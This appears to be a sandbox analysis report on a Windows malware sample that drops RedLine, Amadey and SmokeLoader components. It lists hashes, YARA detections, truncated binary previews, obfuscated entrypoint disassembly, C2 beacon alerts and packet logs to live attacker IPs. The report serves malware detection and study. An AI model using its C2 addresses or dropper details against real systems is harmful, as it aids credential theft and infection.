SHA-256:	ECE7F98DC7A22C00D8B51E06BCB9971E303B732C3BD80726F75355ED39C41831
SHA-512:	8C6F64C75C70F624E69E47B26F2761611895672A3081424E5F20618ACFC9921E0E50429E188286BDF9E14FFE53A6167F8CFED5D66697565106654DB90BEBAAFC
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..............0... ...@....@.. ....................................@................................../..S....@..N............................................................................ ............... ..H............text...4.... ...................... ..`.rsrc...N....@......................@..@.reloc..............................@..B.................0......H............0.............................................................T...<.......\...}..d.O...T..&....[.x.3."!...V..'....z.....-.;....-.f.F<~.4>....e.K....Oi.99..C....V......Jp`.$...[.`.D..o.g....=k..\w..6B........T@..\|L..r.x.r....fs.N...g.........].-2Q..n.8..k&..WA....3....hrw.i....p..i.G..bQa..{...XK......hI.z}F."...kg....=.......r..oMOQD.""A..~..,..2P...r...c.8......x..J.'.M.......o....u...X!..V..VH4....[.....[.qL.KQ^.}.........K.....2\|..n

C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\D217.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	240128
Entropy (8bit):	7.4732463278522205
Encrypted:	false
SSDEEP:	3072:KDy+bnr+O1F5GWp1icKAArDZz4N9GhbkrNEk1M6D5dMOt7WQqmuXIsjXoc:KDy+bnr+Sp0yN90QEJzDQqmSY
MD5:	0B98CC363FAFDAAC610709394C959F05
SHA1:	69D7318743EA1ED3ADD5D47682859E51B77A35E9
SHA-256:	7891236325BE2012AE47829450D86BC5ECC89B30808487964D9B4C7C17DCA409
SHA-512:	52DDE6BB08A9F5F82EE69A98C7EA882BEB74C47444A944D92679BF5E53D478AD2EECF5ADF0B5752E8E8B83D0285F27504A740761D50FD0D3CFC4EE56B9CEF537
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d...B......`j............@.................................4.....@...... ......................................D#..............................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc....0.......$...\|..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	4.97029807367379
Encrypted:	false
SSDEEP:	96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
MD5:	7E93BACBBC33E6652E147E7FE07572A0
SHA1:	421A7167DA01C8DA4DC4D5234CA3DD84E319E762
SHA-256:	850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
SHA-512:	250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc.............................@..B.................@......H.......T$...............................................................0...........@s.....@...(....&..0..K......... ?...(......~....(....,.r...p.....(....%..(....& ....(....(....&.(....&..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-..(....&(.....o....(....&..X....i2..(....&....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-..(....&.o....(....&..X....i2..(....&.0..c......... ?...(......~....(....,.*....(............%...(...

C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	228864
Entropy (8bit):	6.421068050458441
Encrypted:	false
SSDEEP:	3072:3vtV3ROZ6RDwrR3wMUzUVwQ3rInyRnIvPak3hhiHFSbuZhuNcZVKBzqm8LHIkbGB:ftV3euVz6rKyS3yHFHhuNcPKpwU+
MD5:	AEA234064483F651010CF9D981F59FEA
SHA1:	002AD73A666D2D92D0C6D6B617E61C6FA0C5F3A6
SHA-256:	58B02C8B4BC2BF7F5F1E8E45D7C206956F188AE56B648922CA75987B999DB503
SHA-512:	EAE415EF55AEB1B4548C2422A72E618FCE17C2C1322918D33DC6B9202A01C743A5684BA28E5D83B6CDB2B703BC12569E6BB0E87EF2DECB4E8A18592E1380A434
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..M.o...o...o..B....o..B....o..B....o.......o.......o......5o..B....o...o...o.......o....m..o.......o..Rich.o..................PE..L....l.d............................?V............@.......................................@..................................K..d................................!..`>..p...................t?.......>..@............................................text...=........................... ..`.rdata..............................@..@.data....$...`.......B..............@....rsrc................Z..............@..@.reloc...!......."...\..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\3448.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	5.26461027337723
Encrypted:	false
SSDEEP:	384:H5gmBcQORffWaO/iV19jldaaeiEDlMCgPl+:H5gmaQI3daVirCgk
MD5:	0D017F7F9508AE53DE2A266572B33B99
SHA1:	A60FD09F1F435A6AE8A8127DDEDF02D2C2A180EF
SHA-256:	9697C311649991DAAF3C30B025CEF3EB50B084EEB9F6B5BAB7B296E96B5EF058
SHA-512:	A02813516381D968288578EDD6AB86528C0CE7589E66DDA37F7CBF48E6C4C82D36984E9F654AFE0A49D737567A5C194225B74391BFBF0B03D4CB558B087B399B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.................2..........ZQ... ...`....@.. ....................................`..................................Q..L....`..v...........................................................................hQ............... ..H............text...p1... ...2.................. ..`.rsrc...v....`.......4..............@..@.reloc...............:..............@..B................H...........f"..........\|,..(...........................................6.(.....(..........0..........(...... ....o.....r...p(....o.....r[..p(....o......o.....o....o.....s........s......(.............io.....o.......'....9.....o......9.....o......9.....o.........(....S."u........J.8....................0..P.........8D....s......r...po....o....o....o....o...........9.....o..........&......,..........%3..........=E........9.....{....9.....{....o......(....*....0#..........s....}.....

C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\3448.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	5.26365957035305
Encrypted:	false
SSDEEP:	384:BgmBcQORffJoOoiV19jTddaeo2A2gilC0:BgmaQHyddaD12gl0
MD5:	4D5F7960D715A6C04F1388FB49521F81
SHA1:	B34D1039F013FFF49D3F4FF568F960DA6CD3F5A7
SHA-256:	364D8DCD82E7A47564A4D3AA2A676013D2F5EB5F3A72F97E56D5FD5657CDF96D
SHA-512:	6D555D3E83BE7912B771696B496098ABCBE52FB609C313B9D0326EB5537F83EF2E5891FEA01811DEF30F6212FCBEAA9DC6C2B742E13DB3CC50530FBF8CDBF505
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...p..d.........."......2..........6Q... ....@...... ....................................`..................................................P..T....`..~...........................................................................DQ............... ..H............text...T1... ...2.................. ..`.rsrc...~....`.......4..............@..@.reloc...............:..............@..BH...........Z"..........\,..(...........................................6.(.....(..........0..........(...... ....o.....r...p(....o.....r[..p(....o......o.....o....o.....s........s......(.............io.....o.......'....9.....o......9.....o......9.....o.........(....S."u........J.8....................0..<.........80....s....r...p(....o....o....o....o..........&......,..........)1........9.....{....9.....{....o......(....*....0#..........s....}.....(.....{.....o.....{.....o.....{.

C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.347409191732122
Encrypted:	false
SSDEEP:	1536:Oo4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJUabaB89p:OoUCWbBNpplToUs1uNhj25LJUQaB89p
MD5:	2392B231CF4A80739B5CB09BF808127D
SHA1:	41B5CF81C50884954911D96444FE83CFD0DA465B
SHA-256:	2244B4DC9AFC6CFAB7EF1DEA92420E2ACD275BAC7349B929A69F3C1AE25F5E2F
SHA-512:	19CEBA063FA1CC1D0116EB11B18D6301A0E1EEDA1CB5B983E331E59E4F12E4D0E36D7B4A1D8259DFF57A79C47FDCEDF89DE8E255D932452E441762E4D440CE34
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....l.d...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	273
Entropy (8bit):	5.254572658458376
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoIR+knaCyjEcXaoD:J0+oxBeRmR9etdzRxGezH0qaCtma+
MD5:	9851B884BF4AADFADE57D911A3F03332
SHA1:	AAADD1C1856C22844BB9FBB030CF4F586ED8866A
SHA-256:	03AFB988F3EEC62C2DA682AF371625ADCAC5A0E69615298F83D99365AB07AC0F
SHA-512:	A7DE560F51BACD381D3E741F887C3C40ECE88521EE93A22A4F7448297E8BDA2131BE866D9AE6438C528D9F40A277C18BAE517DEEC16B6B723F67D4C308031327
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<hr>.<address>Apache/2.4.41 (Ubuntu) Server at 77.91.68.61 Port 80</address>.</body></html>.

C:\Users\user\AppData\Roaming\jfshvii

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35921
Entropy (8bit):	7.18158138745527
Encrypted:	false
SSDEEP:	384:K9VD6tee+qUOTd2opQTLAdz1SvNmhpdvOjT7PbA6HBiTSnjxZMdP05ldpRMaYIBI:k6Qe+qUv8zcqdvOXA6XkPslJvGaVW
MD5:	1A2B0AB54AFD2BAE94B94B2D8BB128FC
SHA1:	BFCAB4E5DC06BEF8D07C82E6E5E49E194FED1146
SHA-256:	0EE0B5D6E07273CE4ECC3CC47E76C58075D06380EE210C715F526D035365F221
SHA-512:	A9B4397E5D7544397B3667CBA4E124324DD6E8546C5E42186858996EB7DEB4CE3526E6CE35F804D996749C4338CF297BD544E24D675AE67C2C990BB0D8E75171
Malicious:	true
Yara Hits:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: C:\Users\user\AppData\Roaming\jfshvii, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L......d...............H.v..........D2............@..................................................................................................................................................................................................text...yt.......v.................. ...................................................................................................e.\|.P^.....jV%.}..G YJ%......B..."7.....T..T....1xj.$.!.I7.#G.7qa.`.G......_....Dn\.o....x^=.....4v.,....3......y..:.~O.[.&..L~.[8i,.5D..r.v..'j>...@...........LR~.m=O...h........g.H......}0....`.... ...~A.?Z.P..b1.f,.........R.U.S...g.....f._...B'.wU.}+..#...=,....v...K_#....wE&.....].D..C.#.m.O.7.=.v.!.....a.".-.GH..3.&....Vx.w..g..%.MJ..L........1#0\|Cy..vt-.......$Kx`..$..#8..Q...V..d#...{.f..'....n..t.u...(r....<$t.u.F.q.V.....u.t..s.4$.................

C:\Users\user\AppData\Roaming\jfshvii:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\cacls.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	15
Entropy (8bit):	3.240223928941852
Encrypted:	false
SSDEEP:	3:o3F:o1
MD5:	509B054634B6DE74F111C3E646BC80FD
SHA1:	99B4C0F39144A92FE42E22473A2A2552FB16BD13
SHA-256:	07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
SHA-512:	A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
Malicious:	false
Reputation:	unknown
Preview:	processed dir:

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.18158138745527
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	q4B165cujP.exe
File size:	35'921 bytes
MD5:	1a2b0ab54afd2bae94b94b2d8bb128fc
SHA1:	bfcab4e5dc06bef8d07c82e6e5e49e194fed1146
SHA256:	0ee0b5d6e07273ce4ecc3cc47e76c58075d06380ee210c715f526d035365f221
SHA512:	a9b4397e5d7544397b3667cba4e124324dd6e8546c5e42186858996eb7deb4ce3526e6ce35f804d996749c4338cf297bd544e24d675ae67c2c990bb0d8e75171
SSDEEP:	384:K9VD6tee+qUOTd2opQTLAdz1SvNmhpdvOjT7PbA6HBiTSnjxZMdP05ldpRMaYIBI:k6Qe+qUv8zcqdvOXA6XkPslJvGaVW
TLSH:	B6F2F10E1AA4A0DDE59651B280C39E77EA8433D314A673C8C173AFFDD787F81B591268
File Content Preview:	MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L......d...............H.v..........D2............@........................................................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x403244
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x649988B2 [Mon Jun 26 12:46:42 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	1
OS Version Minor:	0
File Version Major:	1
File Version Minor:	0
Subsystem Version Major:	1
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
call 00007FE804D12D45h
jne 00007FE804D12D46h
je 00007FE804D12D44h
mov esp, 241C8B55h
add esp, 04h
jmp 00007FE804D12D4Ch
inc eax
sub ebx, 00003249h
jmp 00007FE804D12D47h
and ch, bl
cmc
inc eax
and dh, byte ptr [ebp+eax+75h]
add ecx, dword ptr [esi-49h]
jecxz 00007FE804D12DACh
xor byte ptr [ebp+05h], dh
je 00007FE804D12D45h
sbb ebp, dword ptr [esi+06EB5ABEh]
dec esp
sub eax, eax
jmp 00007FE804D12D47h
sub bl, ch
stc
dec esp
sub bl, ch
add eax, F1928A88h
mov byte ptr [ebx+eax+02h], ah
je 00007FE804D12D49h
jne 00007FE804D12D47h
cmp bl, dh
fcomp qword ptr [ebp+edx*8+00A4B0FFh]
add byte ptr [eax], al
jne 00007FE804D12D46h
je 00007FE804D12D44h
jne 00007FE804D12CF6h
add esp, 04h
mov ecx, dword ptr [esp-04h]
jmp 00007FE804D12D48h
mov bl, 92h
int1
mov byte ptr [eax+06F980A2h], dl
jl 00007FE804D12DAAh
jmp 00007FE804D12D4Bh
cmp al, 14h
xlatb
mov esi, eax
jmp 00007FE804D12D47h
jmp far 06EBh : DCF8EB9Dh
enter F192h, 88h
enter 0F88h, B6h
dec eax
add ch, bl
add eax, F192D5C4h
mov byte ptr [ebx+10EB01C1h], al
adc byte ptr [esi-49h], ah
push eax
inc edx
push ecx
mov eax, dword ptr [esp]
add esp, 04h
jmp 00007FE804D12D47h
nop
dec ebp
jmp 00007FE804D12D35h
cmp ch, bl
paddsw mm3, mm2
cmpsd
adc byte ptr [edi+0031EC68h], 00000000h
pop ecx
jmp 00007FE804D12D47h
add dh, byte ptr [ebx+ebp*8+01EBE8F4h]
imul esi, edi, 0C05EBE1h
or eax, 00000093h

Data Directories

Name	Virtual Address	Virtual Size
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7479	0x7600	False	0.9284957627118644	data	7.876606251361052	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.577.91.68.2949724802851815 07/27/23-01:33:02.402503	TCP	2851815	ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18	49724	80	192.168.2.5	77.91.68.29
192.168.2.577.91.68.2949718802851815 07/27/23-01:32:59.183951	TCP	2851815	ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18	49718	80	192.168.2.5	77.91.68.29

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2023 01:32:59.068342924 CEST	49718	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:32:59.113020897 CEST	80	49718	77.91.68.29	192.168.2.5
Jul 27, 2023 01:32:59.113224983 CEST	49718	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:32:59.116538048 CEST	49718	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:32:59.116631985 CEST	49718	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:32:59.160849094 CEST	80	49718	77.91.68.29	192.168.2.5
Jul 27, 2023 01:32:59.160900116 CEST	80	49718	77.91.68.29	192.168.2.5
Jul 27, 2023 01:32:59.169712067 CEST	80	49718	77.91.68.29	192.168.2.5
Jul 27, 2023 01:32:59.183950901 CEST	49718	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:32:59.183950901 CEST	49718	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:32:59.228708029 CEST	80	49718	77.91.68.29	192.168.2.5
Jul 27, 2023 01:32:59.228807926 CEST	80	49718	77.91.68.29	192.168.2.5
Jul 27, 2023 01:32:59.233808994 CEST	80	49718	77.91.68.29	192.168.2.5
Jul 27, 2023 01:32:59.244791031 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.289695978 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.292360067 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.300067902 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.345643044 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.345721960 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.345776081 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.345830917 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.345889091 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.345906973 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.345948935 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.345963955 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.346016884 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.346069098 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.346120119 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.346174955 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.346154928 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.346250057 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.346250057 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.356347084 CEST	49718	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:32:59.391206026 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.391279936 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.391334057 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.391371965 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.391391993 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.391406059 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.391439915 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.391458035 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.391494989 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.391506910 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.391530037 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.391562939 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.391594887 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.391625881 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.391635895 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.391635895 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.391658068 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.391690969 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.391722918 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.391738892 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.391756058 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.391773939 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.391789913 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.391822100 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.391833067 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.391854048 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.391885042 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.391916037 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.391930103 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.391961098 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.436722994 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.436785936 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.436825037 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.436861992 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.436906099 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.436924934 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.436934948 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.436979055 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.436995029 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.437016964 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.437055111 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.437092066 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.437129974 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.437169075 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.437175989 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.437175989 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.437175989 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.437206984 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.437232018 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.437237024 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.437258959 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.437280893 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.437302113 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.437345982 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.437382936 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.437387943 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.437452078 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.437489033 CEST	80	49719	77.91.124.47	192.168.2.5
